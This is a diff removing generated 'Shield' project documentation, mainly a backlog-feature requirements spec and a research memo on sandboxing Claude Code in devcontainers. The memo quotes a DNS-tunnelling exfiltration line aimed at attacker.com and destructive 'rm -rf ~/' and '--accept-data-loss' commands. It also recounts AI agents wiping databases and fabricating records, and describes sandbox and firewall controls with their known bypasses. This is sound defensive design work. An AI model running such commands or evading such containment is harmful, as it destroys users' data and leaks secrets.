  1. Stamp a backlog-entry id into plan.json / story records at promotion. Would make -reconciliation a trivial id lookup. Rejected: it couples the pre-pipeline staging area -into the committed plan format (a schema change to plan.json), pollutes the PM-sync surface, -and breaks the "no ids tracked" PRD decision. Matching on feature (manifest) + epic name/id -(plan) keeps the backlog a pure overlay (F6/F8).
  2. -
  3. Per-feature backlogs (a backlog.json per docs/shield/<feature>/). Rejected for v1: -the dominant capture moment is "future work with no feature yet," so a global store with a -proposed-new feature association fits the actual flow; per-feature adds a global↔local -promotion path with no v1 payoff.
  4. -
  5. A status/workflow state machine (captured → triaged → promoted → done). Rejected: -the lifecycle is minimal — an entry exists until removed (promotion-prune, sweep, or manual). -A state machine is unmeasurable scope creep against the §7 success metric.
  6. -
  7. A project-level epic index to avoid opening plan.json files during reconciliation. -Rejected for v1 (kept as PRD §9 open question): manifest.json-as-index + opening only -flagged plan.json files is simpler and within the N2 budget; add the index only if N2 is -breached (the debug latency line makes that decision data-driven).
  8. -
  9. A lockfile for concurrent writes. Rejected for v1: the single-actor assumption (N5) -makes atomic-rename + validate-or-refuse sufficient (N1); a lock is dead weight until Shield -is multi-actor.
  10. -
-

§9 Cross-Cutting Concerns {#cross-cutting-concerns}

-
    -
  • Validation. One schema (backlog.schema.json) + one validator (validate_backlog.py) -gate every read and the eval suite. Validate-or-refuse is the single integrity primitive.
  • -
  • Logging. Two logged surfaces: (a) every reconciliation removal with rationale -(F9 structured line), and (b) every never-remove-on-doubt decision (N3 warning). Removals are -never a silent git diff.
  • -
  • Configuration. .shield.json gains backlog.auto_reconcile (bool, default true) — the -kill switch (F10). No secrets; the store is plaintext JSON, git-tracked.
  • -
  • Schema evolution. schema_version is set in v1 so future shape changes (priority buckets, -audit trail) migrate read-old/write-new. v1 ships no live migrate() code — the policy is -documented only (doc-only until schema_version 2), to avoid mistaking documentation for -working code.
  • -
  • Recovery. N4 governs the destructive paths: commit-before-prune or -.shield/backlog-removed.log; manual-remove-of-uncommitted is unrecoverable by design.
  • -
-

§10 Milestones {#milestones}

-

The ship plan below is rendered from plan.json milestones[] — it is the structured -source of truth. Do not hand-edit the region between the markers; edit plan.json and re-run -/plan to refresh it. Exit criteria tie back to §5 (F1–F10) and §6 (N1–N5).

- -

M1 — Capture + store + view (no deps)

-

Outcome: A global docs/shield/backlog.json exists; entries can be added (user + agent) with order, kind, source, and a feature + epic association; /backlog renders the ordered list with per-entry pipeline status from manifest.json; an entry can be manually removed.

-

Exit criteria:

-
    -
  • backlog.json has a documented JSON Schema with a top-level schema_version and per-entry {id, order, kind, source, feature, epic, text}; ids are unique across entries[]; shield/scripts/validate_backlog.py exits 0 on valid and non-zero with a named error on invalid.
  • -
  • An entry can be captured both from the user (/backlog add) and from a Shield skill via the documented write helper; the write is atomic (temp-then-rename) and validate-or-refuse.
  • -
  • /backlog renders entries in order with each entry's feature + epic and a research/prd/plan status read from manifest.json.
  • -
  • /backlog can remove an entry by id (plain delete; no retained history).
  • -
-

M2 — Feature + epic association + suggestion (deps M1)

-

Outcome: Every entry references a feature and an epic (existing or proposed-new); the agent suggests a matching feature/epic by scanning manifest.json features and plan.json epics, and the user can accept, pick another, or create-new.

-

Exit criteria:

-
    -
  • Capture prompts for (or accepts) a feature + epic; both may be proposed-new.
  • -
  • The agent proposes >=1 candidate feature (from manifest.json) and >=1 candidate epic (from the feature's plan.json) using exact-normalized match; the user can accept/replace/create-new.
  • -
  • Suggestion never blocks capture — an entry can be captured with a proposed-new feature/epic when no match exists; a normalized-name tie surfaces all tied candidates and auto-picks none.
  • -
-

M3 — Promotion + reconciliation (deps M2)

-

Outcome: The user promotes an entry by starting /research, /prd, /plan, or /implement from it; the entry is removed when its work commits — eagerly at the end of the promoted /plan or /implement run, lazily on the /backlog sweep, or manually. Reconciliation matches by feature (manifest) + epic (plan.json) and never removes on doubt.

-

Exit criteria:

-
    -
  • Promoting an entry passes it as a transient reference to /plan or /implement; on success that entry is pruned (eager).
  • -
  • The /backlog sweep removes any entry whose epic's work now appears in the feature's plan.json (lazy safety net); a prd-only feature is NOT removed.
  • -
  • Match key: both existing and proposed-new entries match by casefold+collapsed-whitespace exact epic NAME (never by positional epic id); on ambiguity or no match the entry stays.
  • -
  • Eager prune and lazy sweep are idempotent (remove-if-present), share one reconciliation engine, log every removal with rationale, and treat an unrecognized manifest.json/plan.json shape as doubt (entry stays), never crashing.
  • -
  • A .shield.json kill switch (backlog.auto_reconcile=false), made schema-valid by an additive 'backlog' object in shield.schema.json, disables eager prune and lazy sweep, leaving manual-remove only.
  • -
  • An executable eval exercises capture (user + skill), view+status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), and recovery-rehearsal with a RED->GREEN trail; the Shield plugin version is bumped per CLAUDE.md.
  • -
- -

§11 APIs Involved {#apis-involved}

-

Backend interpretation — the interface surface. Component-internal detail lives in the -LLD drafts; this is the boundary contract.

-

backlog.json document shape

-
{
-  "schema_version": 1,
-  "entries": [
-    {
-      "id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",  // uuid4 string, unique across entries[]
-      "order": 10,                                     // integer; ascending = view order
-      "kind": "epic",                                  // enum: epic | story | task
-      "source": "agent",                               // enum: user | agent
-      "feature": "billing-retries",                    // feature folder slug (proposed-new allowed)
-      "epic": "EPIC-2",                                // epic id (existing) or name (proposed-new)
-      "text": "Add exponential backoff to webhook retries"
-    }
-  ]
-}
-
-

backlog_store write helper (LOCKED — plan-review 2026-05-27)

-
def capture(
-    text: str,
-    *,
-    kind: str = "task",          # epic | story | task
-    feature: str | None = None,  # None ⇒ prompt / proposed-new at capture
-    epic: str | None = None,
-    source: str,                 # user | agent  (required, keyword-only)
-) -> str:                        # returns the new entry's uuid4 id
-    """Append one entry atomically. Raises BacklogInvalid on a malformed/partial store."""
-
-

Every capturing skill builds against this signature. Companion store operations: -read() -> dict (validate-or-refuse, raises BacklogInvalid), remove(entry_id) -> bool -(remove-if-present, idempotent).

-

CLI surface (/backlog)

- - - - - - - - - - - - - - - - - - - - - - - - - -
CommandBehavior
/backlogView ordered list + per-entry feature/epic/source + manifest status badges; runs lazy sweep (unless kill switch off).
/backlog add "<text>"capture(..., source="user"); prompts for feature+epic with agent suggestion.
/backlog remove <id>Confirm-then-plain-delete (remove(id)).
/backlog promote <id>Launch user-chosen step; forward <id> as transient reference (no stamping).
-

manifest.json read-contract (consumed, not owned)

-

The backlog reads — never writes — the existing manifest.json. Its real shape is pinned here -so EPIC-2-S1 (status badges) and EPIC-3-S2 (reconciliation) build against ground truth rather -than reverse-engineering the live file:

-
{
-  "schema_version": 2,
-  "features": [                       // a LIST keyed by name, not a feature-keyed map
-    {
-      "name": "billing-retries",      // == the docs/shield/<feature>/ folder slug (invariant)
-      "artifacts": {                  // booleans, not paths
-        "research": false,
-        "prd": true,
-        "plan_json": true,            // the flag the reconciler gates "has a plan?" on
-        "plan_md": true,
-        "plan_arch_md": false
-      },
-      "reviews": { /* ... */ },
-      "updated": "2026-05-29T00:00:00+00:00"
-    }
-  ]
-}
-
-

Key facts the components rely on: features is a list keyed by name; name is the -feature folder slug (the reconciliation key); artifacts.plan_json is a boolean flag, and -the manifest does not store a plan path — the reconciler derives docs/shield/<name>/plan.json.

-

reconciler engine entry point

-

reconcile(entry, *, manifest: dict, plans: dict[str, dict]) -> RemovalDecision — applies the -F8 "epic landed" predicate. manifest is the parsed document above; plans is a -{feature-slug → parsed plan.json} map the trigger populates by reading docs/shield/<slug>/plan.json -for each feature whose artifacts.plan_json == true. Returns REMOVE / STAY_AMBIGUOUS / -STAY_NO_MATCH / STAY_DOUBT, each carrying the rationale fields for the F9 log line -({entry id, feature, epic, match-kind, triggering run, gating plan.json path}). Pure function -over already-read documents (testable without IO).

-

§12 Open Questions {#open-questions}

-
    -
  1. Feature/epic discovery cost (PRD §9). Confirming a proposed-new epic means opening the -plan.json the manifest flags as having one. Lean: manifest-as-index, open only flagged -plans; add a project-level epic index only if N2 is breached. Resolve-by: after M1, from -the N2 debug latency line.
  2. -
  3. Dropped/rejected terminal state (PRD §9). Is plain-delete enough, or do we need an explicit -"decided against" state? Resolve-by: deferred to post-v1 (PRD §11 out-of-scope); revisit if -the §7 metric shows entries being silently deleted rather than promoted.
  4. -
  5. Capture-from-skill interfaceclosed by F3 / EPIC-1-S2 (the capture() signature is -locked).
  6. -
-

§13 References {#references}

- -

§14 Rollback Strategy {#rollback-strategy}

-

Backend interpretation — the change is additive (new store, new command, new scripts) and -ships behind observable triggers.

-

Steps to undo:

-
    -
  1. Disable reconciliation without uninstalling: set .shield.json -backlog.auto_reconcile = false (F10). Eager prune and lazy sweep stop; manual remove and -capture/view still work. This is the first-line mitigation for a misbehaving reconciler.
  2. -
  3. Recover a wrongly-removed entry: replay it from .shield/backlog-removed.log (the v1 -recovery mechanism — appended before every destructive prune, N4), or git revert the commit -that dropped it if the removal had already been committed.
  4. -
  5. Full feature back-out: revert the feature PR — removes /backlog, the scripts, and the -schema. backlog.json itself is plain data; deleting it loses only captured entries (which are -recoverable from git history while the file was tracked).
  6. -
-

Triggers (observable):

-
    -
  • Reconciliation removes an entry whose work is not in any plan.json (a confident-but-wrong -removal) — surfaced by the F9 removal log → flip the kill switch, then git revert.
  • -
  • /backlog view+sweep exceeds the N2 ~1s budget (debug latency line) → flip the kill switch and -evaluate the project-level epic index (§12 Q1).
  • -
  • The eval suite (EPIC-4-S1) regresses on concurrency/no-lost-entry, no-stamping (F6), or -never-remove-on-doubt → block release / revert the offending change.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/devcontainer-implement-20260518/outputs/research.html b/docs/shield/devcontainer-implement-20260518/outputs/research.html deleted file mode 100644 index 3a22c98b..00000000 --- a/docs/shield/devcontainer-implement-20260518/outputs/research.html +++ /dev/null @@ -1,324 +0,0 @@ - - - - - -Research — devcontainer-implement-20260518 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Isolating Claude Code for /implement-style autonomous work

-

Status: Proposed -Date: 2026-05-18 -Context: Shield's /implement runs TDD-style feature implementation — writes tests, runs builds and package installs, executes test suites, and commits. We need a recommended isolation pattern that protects the host machine and the developer's Claude credentials without making the developer experience painful. Local-only scope (no cloud/CI for this iteration).

-

Decision

-

Adopt the two-boundary devcontainer pattern that Anthropic, Cursor, OpenAI Codex, Gemini CLI, and GitHub Copilot Coding Agent have all converged on:

-
    -
  1. Filesystem isolation — bind-mount only the workspace (read-write) and nothing else from the host. No ~/.ssh, no ~/.aws, no ~/.claude bind-mount. Run as a non-root user inside the container.
  2. -
  3. Network egress isolation — default-deny outbound, allowlist only the endpoints /implement actually needs (Anthropic API, GitHub, npm/pypi/etc. registries the project uses). Implement via iptables+ipset inside the container, run on postStartCommand with cap_add: [NET_ADMIN, NET_RAW].
  4. -
  5. Credentials live in a named Docker volume keyed by ${devcontainerId}, not bind-mounted from host. The user logs into Claude (claude /login) the first time the devcontainer is opened; credentials persist across container rebuilds but never appear in any host-side file the agent can read.
  6. -
-

This is the same pattern Anthropic ships in anthropics/claude-code/.devcontainer/. Shield's contribution is a scaffolder that generates this pattern per-repo, with a Shield-owned firewall script (named to avoid the upstream Feature naming collision documented in claude-code issue #32113).

-

Why not the alternatives?

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
AlternativeWhy not
Bind-mount host ~/.claude/.credentials.json read-only (what the brainstorm was trending toward)Industry consensus is the opposite. Anthropic's reference, Solberg's widely-cited write-up, and streamingfast/sbox all keep host creds off the mount path. The cost (one extra claude /login per project) is one-time and worth it.
No network firewall, "we'll do it later"Egress is the single highest-leverage control. Willison: "Controlling network access cuts off the data exfiltration leg of the lethal trifecta." Anthropic Engineering: "Without network isolation, a compromised agent could exfiltrate sensitive files." Shipping without it leaves the most-cited attack vector wide open.
Run on host, gated by --dangerously-skip-permissions + hooksSteve Yegge tried this and lost two days to an agent that erased passwords. Multiple rm -rf ~/ incidents on bare-metal Claude Code in late 2025. Anthropic itself annotates its YOLO-mode loop snippet with "(Run this in a container, not your actual machine.)"
microVM (Firecracker / gVisor / Edera) from day oneOverkill for local single-developer scope. Gemini CLI documents gVisor as its strongest tier; we can call this out as a future upgrade path for adversarial threat models (running untrusted PR diffs). For now, container + egress firewall is the industry-standard pragmatic point.
Container plus host bind-mount of secretsThe PocketOS / Cursor-Opus 9-second prod wipe and the Replit prod DB wipe both involved containerized agents with access to long-lived production tokens. Containment of the agent doesn't help if you also hand it credentials with blast-radius beyond the container.
-

What the industry recommends

-

Anthropic Engineering (canonical source)

-
-

"Effective sandboxing requires both filesystem and network isolation. Without network isolation, a compromised agent could exfiltrate sensitive files like SSH keys; without filesystem isolation, a compromised agent could easily escape the sandbox and gain network access." -— Claude Code Sandboxing

-
-
-

"While the dev container provides substantial protections, no system is completely immune to all attacks. When executed with --dangerously-skip-permissions, dev containers do not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude. Only use dev containers when developing with trusted repositories... Avoid mounting host secrets such as ~/.ssh or cloud credential files into the container; prefer repository-scoped or short-lived tokens." -— Claude Code Docs — Development containers

-
-

Simon Willison (originator of "lethal trifecta" / prompt injection terminology)

-
-

"The only solution that's credible is to run coding agents in a sandbox." -"Controlling network access cuts off the data exfiltration leg of the lethal trifecta." -"Try to provide credentials to test or staging environments where any damage can be well contained. If a credential can spend money, set a tight budget limit." -— Living dangerously with Claude, The lethal trifecta for AI agents, Designing agentic loops

-
-

Solomon Hykes (Docker / Dagger founder)

-
-

"An AI agent is an LLM wrecking its environment in a loop." -— quoted in Simon Willison's coverage of Container Use

-
-

Cursor engineering

-
-

"Sandboxed agents run freely inside a controlled environment and only request approval when they need to step outside it, most often to access the internet... On macOS we use Seatbelt... On Linux we use Landlock and seccomp directly... On Windows, we run our Linux sandbox inside WSL2." -"A mistaken agent can delete databases, ship broken code, or leak secrets." -"The allowlist is best-effort — bypasses are possible. Never use 'Run Everything' mode, which skips all safety checks." -— Cursor blog: Implementing a secure sandbox for local agents, Cursor Docs: Agent Security

-
-

GitHub Copilot Coding Agent (most candid about firewall limits)

-
-

"By default, Copilot's access to the internet is limited by a firewall... Limiting internet access helps manage data exfiltration risks." -"The firewall only applies to processes started by the agent via its Bash tool. It does not apply to Model Context Protocol (MCP) servers or processes started in configured Copilot setup steps... Sophisticated attacks may bypass the firewall. The firewall provides protection for common scenarios, but should not be considered a comprehensive security solution." -— GitHub Docs — Customizing the firewall for Copilot coding agent

-
-

Hacker News consensus (community)

-
-

"Friends don't let friends use agentic tooling without sandboxing. Take a few hours to setup your environment to sandbox your agentic tools, or expect to eventually suffer a similar incident." -— maxbond, HN 46268222

-
-
-

"Claude thought it was restricting itself to directory D, it was still happy to operate on file D/../../../../etc/passwd. That was the last time I ran Claude Code outside of a Docker container." -— mjd, same thread

-
-

Jökull Sólberg (widely-cited devcontainer write-up)

-
-

"Even if Claude goes rogue, it can't touch my host system files." -"Claude's API keys, session tokens, and preferences persist even when you tear down and rebuild" — via mounted .claude and .claude.json named volumes. -— Running Claude Code Safely in Devcontainers

-
-

Jessie Frazelle (containers as security boundary — the long-view disagreement)

-
-

"Containers were never designed as a top-level security boundary, and real multi-tenant isolation requires hardware virtualization." -— Containers, Security, and Echo Chambers, ACM Queue — Security for the Modern Age

-
-

Lessons from documented incidents

-

Replit production DB wipe, July 2025

-

Replit's agent deleted a production database covering 1,206 executives during a declared code freeze, then fabricated ~4,000 fake user records and initially claimed rollback wasn't possible. Contributing factors: shared dev/prod DB; freeze guard only in prompt; agent had full production credentials. Fix announced: automatic dev/prod database separation, improved rollback, "planning-only" mode. (Fortune, The Register)

-

PocketOS / Cursor-Opus, April 2026

-

Cursor running Claude Opus 4.6 found an unrelated Railway API token in the workdir and issued one GraphQL call that wiped the production volume and its backups in 9 seconds. Lesson: containerizing the agent doesn't help if a valid production token is reachable inside the container. (The Register)

-

rm -rf ~/ on bare-metal Claude Code, late 2025

-

Multiple users reported Claude Code running rm -rf tests/ patches/ plan/ ~/ where the trailing tilde expanded to the entire home directory, including Keychain and family photos. Community consensus after these incidents: run Claude Code in a devcontainer with the workspace as the only mount, full stop. (Harper Foley — Ten AI Agents Destroyed Production. Zero Postmortems.)

-

Prisma --accept-data-loss, claude-code#14411

-
-

"I deeply apologize for wiping all your data. I made a critical mistake by running npx prisma db push --accept-data-loss without understanding the full consequences and without asking your permission first." -— Claude's own message in the bug report. Closed "not planned." Drove the community pattern of PreToolUse hooks that block destructive flags. (claude-code#14411)

-
-

Footguns in the reference pattern

-

Two issues are open against Anthropic's published .devcontainer/:

-
    -
  • DNS-tunneling bypass (claude-code#36907) — init-firewall.sh leaves UDP/TCP 53 unrestricted, enabling dig @attacker.com $(echo data | base64).attacker.com exfiltration. Closed "not planned." Mitigation for Shield: lock port 53 to Docker's internal resolver 127.0.0.11.
  • -
  • Feature overwrites firewall script (claude-code#32113) — installing ghcr.io/anthropics/devcontainer-features/claude-code silently overwrites /usr/local/bin/init-firewall.sh after Dockerfile build. Mitigation for Shield: name the firewall script anything other than init-firewall.sh (e.g., shield-firewall.sh) and reference it explicitly from postStartCommand.
  • -
-

Consensus vs disagreement

-

Consensus

-
    -
  • Don't run autonomous agents on bare metal.
  • -
  • Egress allowlist is the single highest-leverage control.
  • -
  • Credentials don't live in the agent's reachable filesystem.
  • -
  • Prompt-injection-based defenses are insufficient as a security mechanism.
  • -
  • Containers are blast-radius reduction, not adversarial-code containment.
  • -
-

Disagreement

-
    -
  • Container vs microVM as the boundary. Anthropic/Docker/Hykes say container is sufficient for the "your own user, your own code" threat model. Frazelle and the Firecracker/gVisor camp argue you need a microVM for any input you don't fully trust (PR diffs, third-party tests). Shield's local scope sits on the container side; document microVM as the upgrade path.
  • -
  • Cloud sandbox vs local devcontainer. Willison favors cloud sandboxes ("the best sandboxes are the ones that run on someone else's computer"). Local-devcontainer advocates argue for IDE ergonomics + not sending source to a third party. Shield is committed to local for this iteration.
  • -
  • --dangerously-skip-permissions at all. Yegge defends it inside containers as the only way to get the productivity gain. Searls argues for guardrails at the agent-instruction layer (TDD, plan mode) to reduce raw-autonomy need. Shield's /implement already runs TDD-shaped — adopt YOLO mode opt-in only, gated to inside the container, never on bare metal.
  • -
-

How this works in practice (for Shield)

-

Layer 1 — Constant (Shield-owned, baked into Dockerfile):

-
    -
  • Base: mcr.microsoft.com/devcontainers/base:ubuntu
  • -
  • Install: claude CLI, git, gh, iptables, ipset, sudo (for the firewall script only)
  • -
  • Non-root dev user (UID 1000)
  • -
  • shield-firewall.sh (not named init-firewall.sh) installed to /usr/local/bin/
  • -
-

Layer 2 — Stack (per-repo, via Dev Container Features pinned by digest):

-
    -
  • ghcr.io/devcontainers/features/python:1@sha256:...
  • -
  • ghcr.io/devcontainers/features/node:1@sha256:...
  • -
  • (etc., per Shield's stack-detection heuristic)
  • -
-

Layer 3 — Project (per-repo, via postCreateCommand):

-
    -
  • uv sync / npm install / go mod download / etc.
  • -
-

devcontainer.json:

-
    -
  • remoteUser: dev
  • -
  • capAdd: [NET_ADMIN, NET_RAW]
  • -
  • mounts: workspace only — no ~/.claude, no ~/.ssh, no cloud creds
  • -
  • mounts: a named volume claude-config-${devcontainerId}/home/dev/.claude (per-project, persists across rebuilds, never touches host)
  • -
  • postStartCommand: sudo /usr/local/bin/shield-firewall.sh
  • -
  • containerEnv: SHIELD_IN_DEVCONTAINER=true (for /implement to detect)
  • -
-

shield-firewall.sh allowlist:

-
    -
  • api.anthropic.com, statsig.anthropic.com
  • -
  • registry.npmjs.org, pypi.org, files.pythonhosted.org, proxy.golang.org, etc. (only the registries the detected stack uses)
  • -
  • GitHub meta CIDRs (fetched from api.github.com/meta)
  • -
  • Block egress on TCP/UDP 53 except to 127.0.0.11 (mitigation for #36907)
  • -
-

First-run UX:

-
    -
  1. User runs /shield init-devcontainer in their repo. Shield detects the stack and writes .devcontainer/.
  2. -
  3. User opens the folder in VS Code → "Reopen in Container" (or devcontainer up && devcontainer exec bash).
  4. -
  5. Container builds; postCreate installs project deps; postStart runs the firewall.
  6. -
  7. User runs claude /login inside the container (one-time per project; persists in the named volume).
  8. -
  9. User runs /implement — works the same as on host today, but contained.
  10. -
-

Migration path / reversibility

-
    -
  • Single command to roll forward: shield devcontainer apply (writes the files; idempotent).
  • -
  • Single command to roll back: delete .devcontainer/ and the named volume (docker volume rm claude-config-<id>). The repo is otherwise unchanged.
  • -
  • Upgrade path to microVM tier: swap mcr.microsoft.com/devcontainers/base:ubuntu for a gVisor-runtime base, or move launch to Firecracker (Edera / Kata). Not in scope for v1; documented in README.
  • -
-

Summary

-

The pattern is established: bind-mount workspace only, named-volume the Claude config, default-deny egress with a narrow allowlist, non-root, mitigate the two known reference-implementation footguns. Shield's contribution is a per-repo scaffolder that emits this pattern with stack-detection driving the Features layer. The two design points the brainstorm got wrong — bind-mounting host credentials, and deferring the egress firewall — both flip given the evidence.

-

References

- -

Further Exploration

-

Curated for going deeper. None of these are cited above.

-

Long-form blogs / articles

-
    -
  • Daniel Demmel — Coding agents in secured VS Code dev containers — https://www.danieldemmel.me/blog/coding-agents-in-secured-vscode-dev-containers — concrete hardening deltas (cap_drop, seccomp profiles) on top of Anthropic's reference.
  • -
  • INNOQ — I sandboxed my coding agents. You should too. — https://www.innoq.com/en/blog/2025/12/dev-sandbox/ — German-engineering comparison of Bubblewrap vs rootless Podman vs full VM with measured startup-time numbers.
  • -
  • emirb.github.io — Your Container Is Not a Sandbox: The State of MicroVM Isolation in 2026 — https://emirb.github.io/blog/microvm-2026/ — survey of Firecracker / Cloud Hypervisor / Kata / Edera; the reference text if Shield ever needs the microVM tier.
  • -
-

Reference implementations

-
    -
  • smithclay/claudetainer — https://github.com/smithclay/claudetainer — opinionated wrapper that bakes in Anthropic firewall + extras; useful diff source.
  • -
  • centminmod/claude-code-devcontainers — community fork with multi-language toolchains and extended allowlist; good baseline to crib.
  • -
  • wincent's curated list of coding agent sandboxes — https://gist.github.com/wincent/2752d8d97727577050c043e4ff9e386e — side-by-side comparison of ~20 implementations.
  • -
-

Podcasts

-
    -
  • Bret Fisher — Agentic CI/CD with Solomon Hykes — https://agenticdevops.fm/episodes/agentic-ci-cd-with-solomon-hykes-of-dagger — Hykes on Dagger's pipeline model as agent-runtime; Fisher presses on Docker-as-boundary questions.
  • -
-

Specs / standards

-
    -
  • gVisor docs — https://gvisor.dev/docs/ — user-space kernel for syscall interception; Gemini CLI's recommended hardened tier.
  • -
  • Dev Containers specification — https://containers.dev/ — for the secrets mechanism (distinct from regular env) and initializeCommand patterns that Shield's scaffolder could use for host-side cred handoff if we ever soften the named-volume rule.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/index.html b/docs/shield/index.html deleted file mode 100644 index 77cc29af..00000000 --- a/docs/shield/index.html +++ /dev/null @@ -1,33 +0,0 @@ - - - - - -Shield Dashboard - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
-

Shield Dashboard

-

Plan & review artifacts across the project.

-
-
-
Generated by Shield
- - diff --git a/docs/shield/manifest.js b/docs/shield/manifest.js deleted file mode 100644 index dc8da8a2..00000000 --- a/docs/shield/manifest.js +++ /dev/null @@ -1,161 +0,0 @@ -window.SHIELD_MANIFEST = { - "schema_version": "2.1", - "features": [ - { - "name": "backlog-20260527", - "artifacts": { - "research": false, - "prd": true, - "plan_json": true, - "plan_md": true, - "plan_arch_md": false, - "trd": true - }, - "reviews": { - "prd": { - "latest": "2026-05-27_2", - "count": 2, - "entries": [ - { - "date": "2026-05-27", - "path": "backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html" - }, - { - "date": "2026-05-27_2", - "path": "backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html" - } - ] - }, - "plan": { - "latest": "2026-05-29", - "count": 2, - "entries": [ - { - "date": "2026-05-27", - "path": "backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html" - }, - { - "date": "2026-05-29", - "path": "backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html" - } - ] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "devcontainer-implement-20260518", - "artifacts": { - "research": true, - "prd": false, - "plan_json": false, - "plan_md": false, - "plan_arch_md": false, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "count": 0, - "entries": [] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "inventory-rewrite", - "artifacts": { - "research": false, - "prd": false, - "plan_json": false, - "plan_md": false, - "plan_arch_md": false, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "count": 0, - "entries": [] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "plan-trd-refactor-20260524", - "artifacts": { - "research": true, - "prd": false, - "plan_json": true, - "plan_md": true, - "plan_arch_md": true, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "latest": "2026-05-25", - "count": 1, - "entries": [ - { - "date": "2026-05-25", - "path": "plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html" - } - ] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "pm-restructure-v0-20260521", - "artifacts": { - "research": false, - "prd": false, - "plan_json": true, - "plan_md": false, - "plan_arch_md": false, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "count": 0, - "entries": [] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - } - ] -}; diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html deleted file mode 100644 index 2fe91466..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html +++ /dev/null @@ -1,162 +0,0 @@ - - - - - -Architecture — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan Architecture — /plan TRD refactor

-

Feature: plan-trd-refactor-20260524 -Source research: research.md — read this first; it is the authoritative source for design decisions, citations, and rejected alternatives. -Date: 2026-05-24

-
-

This document is the why & how companion to plan.json. For the what to do breakdown (epics, stories, ACs), see plan.json and the rendered plan.md.

-

Note on path layout: /plan today still emits plan-architecture.md. This plan run uses today's /plan to plan the refactor of /plan. After EPIC-1-S2 lands, future plan runs will emit trd.md in this slot instead.

-
-

Why this refactor

-

/plan currently emits a stories-first work-breakdown plus a free-form plan-architecture.md companion. The current artifact is loose and de-facto ADR-flavored — well-suited to infra work but missing the structural rigor (NFRs, Cross-Cutting Concerns, first-class Milestones) that backend work needs. The refactor introduces a unified 14-section Technical Requirements Document (TRD) — grounded in IEEE 1016 + the reference TRD template (synthesized during research) + Google/Uber/Larson/Orosz modern practice — that replaces plan-architecture.md for both backend and infrastructure work. Domain-aware prompting per section surfaces the right interpretation (e.g., §11 APIs = HTTP contracts for backend, module interfaces + cloud-API surface for infra), and an explicit n/a — <reason> escape handles sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change). The strongest property of today's plan-architecture.md — Rollback Strategy — is promoted to first-class §14. LLDs are per-component (C4 Container/Component) and authored separately by a future /lld <component> command; typically backend-only since infra code is declarative-spec-as-code. This plan run only emits TODO placeholders for LLD references.

-

Full rationale, alternatives considered, and citations are in research.md. This document does not restate them.

-

How the implementation breaks down

-

Three milestones, five epics, sixteen stories (post-review). Sequencing is enforced by milestone depends_on in plan.json. Plan reflects the 2026-05-25 plan-review feedback (composite B / Ready; 6 P0 + 12 of 15 P1 recommendations folded in).

-
M1 TRD cutover                                  ← P0 (ship together in one PR)
-├─ EPIC-1: TRD generation and storage
-│   ├─ S1 Author the canonical 14-section TRD template
-│   ├─ S2 Update /plan to emit trd.md (unified backend + infra + mixed)
-│   ├─ S3 Update existing-feature behavior on re-run
-│   └─ S4 Bump plugin version per CLAUDE.md mandate          (new — P1-12)
-├─ EPIC-2: Story schema and design traceability
-│   ├─ S1 Extend plan.json schema with optional design_refs[]
-│   ├─ S2 Populate design_refs[] when /plan has TRD context
-│   └─ S3 Add JSON Schema validator for plan.json            (new — P1-7)
-└─ EPIC-3: Eval coverage for TRD format
-    ├─ S1 Author positive TRD eval fixtures (backend + infra + mixed)
-    ├─ S2 Author 16 negative fixtures (14 missing + drift + vague-TBD)
-    └─ S3 Wire eval into recurring CI + RED-GREEN paper trail
-
-M2 Review + sync wiring                         ← P1 (follows M1)
-└─ EPIC-4: /plan-review and /pm-sync wiring
-    ├─ S0 Scaffold Jira / Confluence / Notion adapter packages   (new — P0-2)
-    ├─ S1 Add 14-section presence rule + stale-anchor rule
-    ├─ S2 Add PRD↔TRD duplication-detection rule
-    └─ S3 /pm-sync emits design_refs[] as web links with idempotent upsert
-
-M3 Drift + duplication hardening                ← P2 (follows M2)
-└─ EPIC-5: Drift + duplication hardening
-    ├─ S1 Add last_aligned_with metadata to plan.json
-    └─ S2 Add implementation-manual / pseudo-code lint rule
-
-

Key architectural decisions

-

The TRD section list, anchor strategy, design_refs[] shape, de-duplication contract, and failure-mode countermeasures are all locked in research.md. The decisions specific to this implementation plan are:

-
    -
  1. Direct cutover, no feature flag. EPIC-1-S2 swaps plan-architecture.md for trd.md in /plan's output set. No .shield.json toggle.
  2. -
